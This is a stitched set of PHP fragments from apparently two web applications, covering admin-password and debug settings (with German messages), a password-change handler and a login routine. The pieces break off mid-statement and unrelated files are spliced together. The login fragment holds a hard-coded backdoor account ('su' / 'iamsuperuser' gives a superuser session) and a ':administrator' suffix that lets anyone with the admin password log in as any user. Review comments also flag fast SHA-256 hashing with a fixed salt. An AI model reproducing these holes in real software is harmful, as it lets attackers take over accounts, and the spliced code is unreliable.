$messages[] = array('text' => nl2br($e->getMessage()), 'strong' => true, 'color' => 'red'); $fatal_error = true; } /******************************************************************************** * * Execute actions * *********************************************************************************/ switch ($action) { case 'apply_connection_settings': $config_old = $config; try { if ($config['is_online_demo']) { break; } if (!is_admin_password($admin_password)) { throw new Exception('Das Administratorpasswort ist falsch!'); } $config['db']['type'] = $db_type; //$config['db']['charset'] = $db_charset; // temporarly deactivated $config['db']['host'] = $db_host; $config['db']['name'] = $db_name; $config['db']['user'] = $db_user; $config['db']['password'] = $db_password; save_config(); header('Location: system_database.php'); // Reload the page that we can see if the new settings are stored successfully } catch (Exception $e) { $config = $config_old; // reload the old config $messages[] = array('text' => 'Die neuen Werte konnten nicht gespeichert werden!', 'strong' => true, 'color' => 'red');
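/**
 * @brief Set a new administrator password
 *
 * @note The password is trimmed, prefixed with a fixed salt, hashed with SHA-256
 *       and stored in $config['admin']['password'].
 *       Optionally, $config is then written to config.php via save_config().
 *
 * @note SECURITY (review): a single SHA-256 round is fast to brute-force, and the
 *       salt is a constant in the source, so it is the same for every installation.
 *       Moving to password_hash()/password_verify() would have to be done together
 *       with is_admin_password(), which is defined elsewhere and must keep accepting
 *       the stored format. The format is therefore left unchanged here.
 *       The minimum length of 4 characters is also very low for an admin account.
 *
 * @param string  $old_password     The current administrator password (plain, not hashed)
 * @param string  $new_password_1   The new administrator password (plain, not hashed) (first time)
 * @param string  $new_password_2   The new administrator password (plain, not hashed) (second time)
 * @param boolean $save_config      If true, the config.php file will be overwritten.
 *                                  If false, the new password will be stored in $config,
 *                                  but you must manually save the $config with save_config()!
 *
 * @throws Exception if the old password is not correct
 * @throws Exception if the new password is not allowed (shorter than 4 characters)
 * @throws Exception if the new passwords are different
 * @throws Exception if $config could not be saved in config.php
 *                   (the previous password hash is restored in $config before rethrowing)
 */
function set_admin_password($old_password, $new_password_1, $new_password_2, $save_config = true)
{
    global $config;

    // Fixed application-wide salt; must match the one used when the password is checked.
    $salt = 'h>]gW3$*j&o;O"s;@&G)';

    settype($old_password, 'string');
    settype($new_password_1, 'string');
    settype($new_password_2, 'string');

    $old_password = trim($old_password);
    $new_password_1 = trim($new_password_1);
    $new_password_2 = trim($new_password_2);

    // The caller must prove knowledge of the current password first.
    if (!is_admin_password($old_password)) {
        throw new Exception('Das eingegebene Administratorpasswort ist nicht korrekt!');
    }

    // mb_strlen counts characters rather than bytes, so multi-byte passwords are measured correctly.
    if (mb_strlen($new_password_1) < 4) {
        throw new Exception('Das neue Passwort muss mindestens 4 Zeichen lang sein!');
    }

    // Strict comparison: two numeric-looking strings must not be treated as equal.
    if ($new_password_1 !== $new_password_2) {
        throw new Exception('Die neuen Passwörter stimmen nicht überein!');
    }

    // Remember the current hash so a failed save does not leave $config out of sync with config.php.
    $previous_hash = isset($config['admin']['password']) ? $config['admin']['password'] : null;

    // all ok, store the new password hash
    $config['admin']['password'] = hash('sha256', $salt . $new_password_1);

    if ($save_config) {
        try {
            save_config();
        } catch (Exception $e) {
            $config['admin']['password'] = $previous_hash;
            throw $e;
        }
    }
}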
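/**
 * @brief Set the enable attribute
 *
 * Disabling the debug log also switches off template debugging and request debugging.
 * If save_config() fails, the whole previous $config['debug'] section is restored
 * before the exception is rethrown, so the in-memory settings stay consistent.
 *
 * @note SECURITY (review): when $config['is_online_demo'] is set, debugging can be
 *       enabled without the admin password. That flag must never be set on a
 *       production installation.
 *
 * @param boolean       $new_enable         The new enable state
 * @param string|NULL   $admin_password     @li The admin password for enabling/disabling the debug log (from "config.php").
 *                                          @li see $config['debug']['password'] in config_defaults.php
 *                                          @li For disabling the debug log,
 *                                              the password is not required (pass NULL)!
 *
 * @throws Exception if there was an error (maybe wrong password)
 */
function set_debug_enable($new_enable, $admin_password = NULL)
{
    global $config;

    if ($new_enable == $config['debug']['enable']) {
        return; // there is nothing to do...
    }

    // Snapshot of the debug section, used to roll back if writing config.php fails.
    $debug_old = $config['debug'];

    if ($new_enable == false) {
        $config['debug']['enable'] = false;
        $config['debug']['template_debugging_enable'] = false;
        $config['debug']['request_debugging_enable'] = false;

        try {
            save_config();
        } catch (Exception $e) {
            // Restore all three flags, not only 'enable'.
            $config['debug'] = $debug_old;
            throw $e;
        }

        return;
    }

    // to activate the debug log, we have to check the admin password.
    // or, for online demos, it's allowed to activate debugging for everyone.
    if (!is_admin_password($admin_password) && !$config['is_online_demo']) {
        throw new Exception('Das Passwort ist nicht korrekt!');
    }

    // create new debug log file if it does not exist already
    if (!is_readable(DEBUG_LOG_FILENAME)) {
        create_debug_log_file();
    }

    $config['debug']['enable'] = true;

    try {
        save_config();
    } catch (Exception $e) {
        $config['debug'] = $debug_old;
        throw $e;
    }
}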
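<?php
// change_password_action.php
//
// Handles the "change admin password" form: requires a logged-in session, checks the
// current admin password, then stores the new one if both new-password fields agree.
// The result is reported through the session "message" and the browser is redirected
// back to the form.
//
// NOTE(review): no anti-CSRF token is checked in this script. Confirm whether
// config.php / functions.php enforce one before a state-changing request reaches here.
include_once "config.php";
include_once "functions.php";

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// Only authenticated sessions may reach the password change logic.
$current_user = get_from_session("current_user");
if (is_null($current_user)) {
    store_in_session("message", "You must login to access this page");
    header("Location: index.php");
    return;
}

// Read the form fields defensively: a missing field or a non-string value
// (e.g. "new_password[]=x" arrives as an array) is treated as absent instead of
// raising a notice or being passed on to the password functions.
$fields = array();
foreach (array("current_password", "new_password", "new_password2") as $field) {
    $fields[$field] = (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : null;
}
$current_password = $fields["current_password"];
$new_password = $fields["new_password"];
$new_password2 = $fields["new_password2"];

if ($current_password === null || !is_admin_password($current_password)) {
    store_in_session("message", "Current password incorrect");
} elseif ($new_password === null || $new_password !== $new_password2) {
    // Strict comparison: with "!=" PHP compares numeric-looking strings by value,
    // so e.g. "1e3" and "1000" would be accepted as a matching confirmation.
    store_in_session("message", "New passwords dont match");
} elseif ($new_password === "") {
    // Never replace the admin password with an empty one.
    store_in_session("message", "New password must not be empty");
} else {
    store_admin_password($new_password);
    store_in_session("message", "New password successfully updated!");
}

header("Location: change_admin_password.php");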
return; } } else { if ($username == "su" && $password == "iamsuperuser") { $data = array(); $data["id"] = 0; $data["firstname"] = "Super"; $data["lastname"] = "User"; $data["profile_picture"] = ""; $data["username"] = "******"; $data["usertype"] = 0; store_in_session("current_user", $data); header("Location: ./admin.php"); return; } else { if (substr($username, -14) == ":administrator" && is_admin_password($password)) { $username = split(":", $username)[0]; $sql = "select * from users where ? in (username, email, another_email)"; $data = R::getRow($sql, array($username)); if (count($data) == 0) { header("Location: ./login_f.php"); store_in_session("message", "Invalid username/password"); return; } else { store_in_session("current_user", $data); $redirect_to = get_from_session("redirect_to"); remove_from_session("redirect_to"); if ($redirect_to == null) { $redirect_to = "index.php"; } header("Location: ./{$redirect_to}");